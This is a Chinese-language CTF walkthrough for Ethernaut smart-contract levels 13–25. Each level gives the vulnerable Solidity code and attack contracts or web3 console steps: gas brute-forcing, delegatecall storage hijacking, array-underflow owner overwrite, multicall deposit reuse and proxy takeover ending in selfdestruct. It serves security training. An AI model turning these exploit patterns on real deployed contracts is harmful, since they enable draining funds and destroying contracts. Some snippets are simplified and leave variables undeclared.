Ethernaut智能合约攻防题解（下）<\/h1>

13. Gatekeeper One<\/h2>

合约分析<\/h3>
contract<\/span> GatekeeperOne<\/span> {
<\/span><\/span>    modifier<\/span> gateOne<\/span>() {
<\/span><\/span>        require(msg.sender !=<\/span> tx.origin);
<\/span><\/span>        _<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    modifier<\/span> gateTwo<\/span>() {
<\/span><\/span>        require(gasleft().mod(8191<\/span>) ==<\/span> 0<\/span>);
<\/span><\/span>        _<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    modifier<\/span> gateThree<\/span>(bytes8<\/span> _gateKey) {
<\/span><\/span>        require(uint32<\/span>(uint64<\/span>(_gateKey)) ==<\/span> uint16<\/span>(uint64<\/span>(_gateKey)));
<\/span><\/span>        require(uint32<\/span>(uint64<\/span>(_gateKey)) !=<\/span> uint64<\/span>(_gateKey));
<\/span><\/span>        require(uint32<\/span>(uint64<\/span>(_gateKey)) ==<\/span> uint16<\/span>(tx.origin));
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    function<\/span> enter<\/span>(bytes8<\/span> _gateKey) public<\/span> gateOne gateTwo gateThree(_gateKey) returns<\/span> (bool<\/span>) {
<\/span><\/span>        entrant =<\/span> tx.origin;
<\/span><\/span>        return<\/span> true<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题要点<\/h3>


gateOne绕过<\/strong>：<\/p>

通过中间合约调用，使msg.sender != tx.origin<\/code><\/li>
<\/ul>
<\/li>

gateTwo绕过<\/strong>：<\/p>

通过调试确定gas消耗量x<\/li>
设置gas为8191*n + x<\/code><\/li>
或者爆破gas值（推荐）<\/li>
<\/ul>
<\/li>

gateThree绕过<\/strong>：<\/p>

第一部分：0x????????0000????<\/code>格式<\/li>
第二部分：高4字节不全为0<\/li>
第三部分：低2字节等于tx.origin地址的低2字节<\/li>
<\/ul>
<\/li>
<\/ol>
攻击合约<\/h3>
contract<\/span> attack<\/span> {
<\/span><\/span>    function<\/span> exploit<\/span>() public<\/span> {
<\/span><\/span>        bytes8<\/span> key =<\/span> 0xAAAAAAAA00004261<\/span>; \/\/ 最后4位替换为你的地址低2字节
<\/span><\/span><\/span><\/span>        for<\/span> (uint256<\/span> i =<\/span> 0<\/span>; i <<\/span> 120<\/span>; i++<\/span>) {
<\/span><\/span>            (bool<\/span> result,) =<\/span> target.call{gas:<\/span> i +<\/span> 150<\/span> +<\/span> 8191<\/span> *<\/span> 3<\/span>}(
<\/span><\/span>                abi.encodeWithSignature("enter(bytes8)"<\/span>, key)
<\/span><\/span>            );
<\/span><\/span>            if<\/span> (result) break<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>14. Gatekeeper Two<\/h2>
合约分析<\/h3>
contract<\/span> GatekeeperTwo<\/span> {
<\/span><\/span>    modifier<\/span> gateOne<\/span>() {
<\/span><\/span>        require(msg.sender !=<\/span> tx.origin);
<\/span><\/span>        _<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    modifier<\/span> gateTwo<\/span>() {
<\/span><\/span>        uint<\/span> x;
<\/span><\/span>        assembly<\/span> { x :=<\/span> extcodesize<\/span>(caller<\/span>()) }
<\/span><\/span>        require(x ==<\/span> 0<\/span>);<\/span>
<\/span><\/span>        _;<\/span>
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    modifier<\/span> gateThree<\/span>(bytes8<\/span> _gateKey) {
<\/span><\/span>        require(uint64<\/span>(bytes8<\/span>(keccak256(abi.encodePacked(msg.sender)))) ^<\/span> uint64<\/span>(_gateKey) ==<\/span> uint64<\/span>(0<\/span>) -<\/span> 1<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题要点<\/h3>


gateTwo绕过<\/strong>：<\/p>

在构造函数中调用，此时extcodesize<\/code>为0<\/li>
<\/ul>
<\/li>

gateThree计算<\/strong>：<\/p>

_gateKey = bytes8(uint64(bytes8(keccak256(abi.encodePacked(address(this))))) ^ (uint64(0) - 1))<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
攻击合约<\/h3>
contract<\/span> attack<\/span> {
<\/span><\/span>    constructor<\/span>(address<\/span> _addr) public<\/span> {
<\/span><\/span>        bytes8<\/span> key =<\/span> bytes8<\/span>(uint64<\/span>(bytes8<\/span>(keccak256(abi.encodePacked(address<\/span>(this))))) ^<\/span> (uint64<\/span>(0<\/span>) -<\/span> 1<\/span>));
<\/span><\/span>        target.call(abi.encodeWithSignature("enter(bytes8)"<\/span>, key));
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>15. Naught Coin<\/h2>
合约分析<\/h3>
contract<\/span> NaughtCoin<\/span> is<\/span> ERC20 {
<\/span><\/span>    function<\/span> transfer<\/span>(address<\/span> _to, uint256<\/span> _value) override<\/span> public<\/span> lockTokens returns<\/span>(bool<\/span>) {
<\/span><\/span>        super.transfer(_to, _value);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    modifier<\/span> lockTokens<\/span>() {
<\/span><\/span>        if<\/span> (msg.sender ==<\/span> player) {
<\/span><\/span>            require(now ><\/span> timeLock);
<\/span><\/span>            _<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题要点<\/h3>

使用transferFrom<\/code>绕过transfer<\/code>限制<\/li>
先调用approve<\/code>授权<\/li>
<\/ul>
攻击步骤<\/h3>
await<\/span> contract<\/span>.approve<\/span>(player<\/span>, totalvalue<\/span>);
<\/span><\/span>await<\/span> contract<\/span>.transferFrom<\/span>(player<\/span>, secondaddr<\/span>, totalvalue<\/span>);
<\/span><\/span><\/code><\/pre>16. Preservation<\/h2>
合约分析<\/h3>
contract<\/span> Preservation<\/span> {
<\/span><\/span>    address<\/span> public<\/span> timeZone1Library;
<\/span><\/span>    address<\/span> public<\/span> timeZone2Library;
<\/span><\/span>    address<\/span> public<\/span> owner;
<\/span><\/span>    
<\/span><\/span>    function<\/span> setFirstTime<\/span>(uint<\/span> _timeStamp) public<\/span> {
<\/span><\/span>        timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>contract<\/span> LibraryContract<\/span> {
<\/span><\/span>    uint<\/span> storedTime;
<\/span><\/span>    function<\/span> setTime<\/span>(uint<\/span> _time) public<\/span> {
<\/span><\/span>        storedTime =<\/span> _time;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题要点<\/h3>

通过delegatecall<\/code>修改timeZone1Library<\/code><\/li>
将timeZone1Library<\/code>指向恶意合约<\/li>
恶意合约的setTime<\/code>修改owner<\/li>
<\/ol>
攻击合约<\/h3>
contract<\/span> attack<\/span> {
<\/span><\/span>    address<\/span> public<\/span> timeZone1Library;
<\/span><\/span>    address<\/span> public<\/span> timeZone2Library;
<\/span><\/span>    address<\/span> public<\/span> owner;
<\/span><\/span>    
<\/span><\/span>    function<\/span> setTime<\/span>(uint256<\/span> a) public<\/span> {
<\/span><\/span>        owner =<\/span> address<\/span>(a);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击步骤<\/h3>

调用setFirstTime<\/code>设置恶意合约地址<\/li>
再次调用setFirstTime<\/code>设置owner地址<\/li>
<\/ol>
17. Recovery<\/h2>
解题要点<\/h3>

在Etherscan查找合约的Internal Txns<\/li>
找到创建的SimpleToken合约地址<\/li>
调用destroy<\/code>函数<\/li>
<\/ol>
攻击合约<\/h3>
contract<\/span> attack<\/span> {
<\/span><\/span>    function<\/span> exploit<\/span>() public<\/span> {
<\/span><\/span>        target.call(abi.encodeWithSignature("destroy(address)"<\/span>, myaddr));
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>18. MagicNumber<\/h2>
解题要点<\/h3>
编写10字节的合约返回42：<\/p>


Runtime代码<\/strong> (10字节):<\/p>
602a60505260206050f3
<\/code><\/pre>

将42(0x2a)存入memory<\/li>
返回memory中的值<\/li>
<\/ul>
<\/li>

Initialization代码<\/strong> (12字节):<\/p>
600a600c600039600a6000f3
<\/code><\/pre>

复制runtime代码到memory<\/li>
返回runtime代码<\/li>
<\/ul>
<\/li>
<\/ol>
完整字节码<\/h3>
600a600c600039600a6000f3602a60505260206050f3
<\/code><\/pre>
19. Alien Codex<\/h2>
合约分析<\/h3>
contract<\/span> AlienCodex<\/span> is<\/span> Ownable {
<\/span><\/span>    bytes32<\/span>[] public<\/span> codex;
<\/span><\/span>    
<\/span><\/span>    function<\/span> retract<\/span>() public<\/span> {
<\/span><\/span>        codex.length--<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    function<\/span> revise<\/span>(uint<\/span> i, bytes32<\/span> _content) public<\/span> {
<\/span><\/span>        codex[i] =<\/span> _content;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题要点<\/h3>

调用retract<\/code>使codex.length<\/code>下溢<\/li>
计算数组起始位置：keccak256(1)<\/code><\/li>
计算覆盖slot0的索引：2^256 - keccak256(1)<\/code><\/li>
调用revise<\/code>修改owner<\/li>
<\/ol>
攻击步骤<\/h3>
await<\/span> contract<\/span>.make_contact<\/span>();
<\/span><\/span>await<\/span> contract<\/span>.retract<\/span>();
<\/span><\/span>const<\/span> index<\/span> =<\/span> BigInt<\/span>(2<\/span>**<\/span>256<\/span>) -<\/span> BigInt<\/span>(web3<\/span>.utils<\/span>.keccak256<\/span>(web3<\/span>.eth<\/span>.abi<\/span>.encodeParameters<\/span>(['uint256'<\/span>], [1<\/span>])));
<\/span><\/span>await<\/span> contract<\/span>.revise<\/span>(index<\/span>, "0x000000000000000000000001"<\/span> +<\/span> player<\/span>.slice<\/span>(2<\/span>));
<\/span><\/span><\/code><\/pre>20. Denial<\/h2>
合约分析<\/h3>
contract<\/span> Denial<\/span> {
<\/span><\/span>    function<\/span> withdraw<\/span>() public<\/span> {
<\/span><\/span>        partner.call{value:<\/span> amountToSend}(""<\/span>);
<\/span><\/span>        owner.transfer(amountToSend);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题要点<\/h3>

使partner.call<\/code>耗尽gas<\/li>
两种方法：

无限循环<\/li>
assert(false)<\/code><\/li>
<\/ol>
<\/li>
<\/ul>
攻击合约<\/h3>
contract<\/span> attack<\/span> {
<\/span><\/span>    fallback() external<\/span> payable<\/span> {
<\/span><\/span>        assert(false<\/span>); \/\/ 或 while(true) {}
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>21. Shop<\/h2>
合约分析<\/h3>
contract<\/span> Shop<\/span> {
<\/span><\/span>    function<\/span> buy<\/span>() public<\/span> {
<\/span><\/span>        if<\/span> (_buyer.price() >=<\/span> price &&<\/span> !<\/span>isSold) {
<\/span><\/span>            isSold =<\/span> true<\/span>;
<\/span><\/span>            price =<\/span> _buyer.price();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解题要点<\/h3>

利用isSold<\/code>状态变化返回不同价格<\/li>
使用staticcall<\/code>检查isSold<\/code><\/li>
<\/ul>
攻击合约<\/h3>
contract<\/span> Buyer<\/span> {
<\/span><\/span>    function<\/span> price<\/span>() external<\/span> view<\/span> returns<\/span> (uint<\/span>) {
<\/span><\/span>        bytes<\/span> memory<\/span> r;
<\/span><\/span>        (,r) =<\/span> target.staticcall(abi.encodeWithSignature("isSold()"<\/span>));
<\/span><\/span>        return<\/span> uint8<\/span>(r[31<\/span>]) ==<\/span> 0<\/span> ?<\/span> 100<\/span> :<\/span> 1<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>22. Dex<\/h2>
解题要点<\/h3>

利用整数除法精度损失<\/li>
循环交换放大代币数量<\/li>
<\/ol>
攻击步骤<\/h3>
\/\/ 初始交换
<\/span><\/span><\/span><\/span>await<\/span> contract<\/span>.swap<\/span>(token1<\/span>, token2<\/span>, 10<\/span>);
<\/span><\/span>\/\/ 后续交换逐步放大
<\/span><\/span><\/span><\/span>await<\/span> contract<\/span>.swap<\/span>(token2<\/span>, token1<\/span>, 20<\/span>);
<\/span><\/span>await<\/span> contract<\/span>.swap<\/span>(token1<\/span>, token2<\/span>, 24<\/span>);
<\/span><\/span>\/\/ 直到清空合约代币
<\/span><\/span><\/span><\/code><\/pre>23. Dex Two<\/h2>
解题要点<\/h3>

部署恶意ERC20代币<\/li>
向Dex添加流动性<\/li>
用恶意代币交换目标代币<\/li>
<\/ol>
攻击合约<\/h3>
contract<\/span> Mytoken<\/span> is<\/span> ERC20 {
<\/span><\/span>    constructor<\/span>(uint<\/span> initialSupply) public<\/span> ERC20("Mytoken"<\/span>, "MYT"<\/span>) {
<\/span><\/span>        _mint(msg.sender, initialSupply);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击步骤<\/h3>
await<\/span> contract<\/span>.add_liquidity<\/span>(mytoken1<\/span>, 100<\/span>);
<\/span><\/span>await<\/span> contract<\/span>.swap<\/span>(mytoken1<\/span>, token1<\/span>, 100<\/span>);
<\/span><\/span><\/code><\/pre>24. Puzzle Wallet<\/h2>
解题要点<\/h3>

通过Proxy修改pendingAdmin<\/code>影响owner<\/code><\/li>
多重调用deposit<\/code>放大余额<\/li>
清空合约余额后修改maxBalance<\/code><\/li>
<\/ol>
攻击步骤<\/h3>
\/\/ 1. 成为owner
<\/span><\/span><\/span><\/span>await<\/span> contract<\/span>.proposeNewAdmin<\/span>(player<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 2. 多重调用deposit
<\/span><\/span><\/span><\/span>const<\/span> depositData<\/span> =<\/span> await<\/span> contract<\/span>.methods<\/span>["deposit()"<\/span>].request<\/span>().then<\/span>(v<\/span> => v<\/span>.data<\/span>);
<\/span><\/span>const<\/span> multicallData<\/span> =<\/span> await<\/span> contract<\/span>.methods<\/span>["multicall(bytes[])"<\/span>].request<\/span>([depositData<\/span>]).then<\/span>(v<\/span> => v<\/span>.data<\/span>);
<\/span><\/span>await<\/span> contract<\/span>.multicall<\/span>([depositData<\/span>, multicallData<\/span>], {value<\/span>:<\/span> toWei<\/span>('0.001'<\/span>)});
<\/span><\/span>
<\/span><\/span>\/\/ 3. 提款并修改maxBalance
<\/span><\/span><\/span><\/span>await<\/span> contract<\/span>.execute<\/span>(player<\/span>, toWei<\/span>('0.002'<\/span>), 0x0<\/span>);
<\/span><\/span>await<\/span> contract<\/span>.setMaxBalance<\/span>(player<\/span>);
<\/span><\/span><\/code><\/pre>25. Motorbike<\/h2>
解题要点<\/h3>

获取Engine合约地址<\/li>
初始化Engine合约<\/li>
通过upgradeToAndCall<\/code>自毁<\/li>
<\/ol>
攻击合约<\/h3>
contract<\/span> attack<\/span> {
<\/span><\/span>    constructor<\/span>(address<\/span> _addr) public<\/span> {
<\/span><\/span>        \/\/ 1. 初始化成为upgrader
<\/span><\/span><\/span><\/span>        _addr.call(abi.encodeWithSignature("initialize()"<\/span>));
<\/span><\/span>        
<\/span><\/span>        \/\/ 2. 部署自毁合约并调用
<\/span><\/span><\/span><\/span>        DestructContract destruct =<\/span> new<\/span> DestructContract();
<\/span><\/span>        _addr.call(abi.encodeWithSignature(
<\/span><\/span>            "upgradeToAndCall(address,bytes)"<\/span>, 
<\/span><\/span>            address<\/span>(destruct),
<\/span><\/span>            abi.encodeWithSignature("destruct()"<\/span>)
<\/span><\/span>        ));
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>contract<\/span> DestructContract<\/span> {
<\/span><\/span>    function<\/span> destruct<\/span>() external<\/span> {
<\/span><\/span>        selfdestruct(msg.sender);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>